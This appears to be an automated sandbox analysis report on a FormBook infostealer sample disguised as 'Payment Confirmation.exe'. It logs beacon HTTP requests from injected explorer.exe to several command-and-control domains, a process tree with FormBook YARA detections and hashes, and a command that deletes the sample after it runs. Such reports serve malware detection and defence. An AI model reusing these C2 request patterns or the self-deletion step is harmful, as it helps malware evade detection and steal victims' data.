                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:37.501957893 CEST5529INHTTP/1.1 301 Moved Permanently
                                                Date: Wed, 13 Oct 2021 14:32:37 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 0
                                                Connection: close
                                                Location: https://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz
                                                Server: HTTPd


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.64980934.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:42.570636034 CEST5539OUTGET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1
                                                Host: www.elliotpioneer.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:42.685873032 CEST5540INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 14:32:42 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "615f93b1-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.649810172.105.103.20780C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:48.382261992 CEST5541OUTGET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.thesewhitevvalls.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.64982252.206.159.8080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:54.093128920 CEST5578OUTGET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1
                                                Host: www.lumberjackguitarloops.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:54.231038094 CEST5581INHTTP/1.1 301 Moved Permanently
                                                Content-length: 0
                                                Location: https://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.64984034.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:33:00.285758972 CEST5620OUTGET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.carts-amazon.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:33:00.400927067 CEST5620INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 14:33:00 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "615f93b1-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.64984145.91.80.18280C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:33:05.709494114 CEST5621OUTGET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1
                                                Host: www.chinaopedia.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:33:06.303915977 CEST5622INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Wed, 13 Oct 2021 14:33:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Set-Cookie: security_session_verify=e3f107f1b9aaa89fb44b8d647caca7b2; expires=Sat, 16-Oct-21 22:33:05 GMT; path=/; HttpOnly
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                9192.168.2.64984262.210.5.8180C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:33:11.330621958 CEST5623OUTGET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.atp-cayenne.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Code Manipulations

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: Payment Confirmation.exe PID: 2244 Parent PID: 2408

                                                General

                                                Start time:16:31:11
                                                Start date:13/10/2021
                                                Path:C:\Users\user\Desktop\Payment Confirmation.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\Payment Confirmation.exe'
                                                Imagebase:0x400000
                                                File size:455901 bytes
                                                MD5 hash:98FFC3C812E6CEC919EBD286973E2002
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Analysis Process: Payment Confirmation.exe PID: 5440 Parent PID: 2244

                                                General

                                                Start time:16:31:13
                                                Start date:13/10/2021
                                                Path:C:\Users\user\Desktop\Payment Confirmation.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\Payment Confirmation.exe'
                                                Imagebase:0x400000
                                                File size:455901 bytes
                                                MD5 hash:98FFC3C812E6CEC919EBD286973E2002
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Analysis Process: explorer.exe PID: 3440 Parent PID: 5440

                                                General

                                                Start time:16:31:17
                                                Start date:13/10/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6f22f0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Analysis Process: msiexec.exe PID: 1516 Parent PID: 3440

                                                General

                                                Start time:16:31:43
                                                Start date:13/10/2021
                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                Imagebase:0x9b0000
                                                File size:59904 bytes
                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Analysis Process: cmd.exe PID: 4852 Parent PID: 1516

                                                General

                                                Start time:16:31:49
                                                Start date:13/10/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
                                                Imagebase:0x2a0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Analysis Process: conhost.exe PID: 3800 Parent PID: 4852

                                                General

                                                Start time:16:31:49
                                                Start date:13/10/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff61de10000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis

                                                Reset < >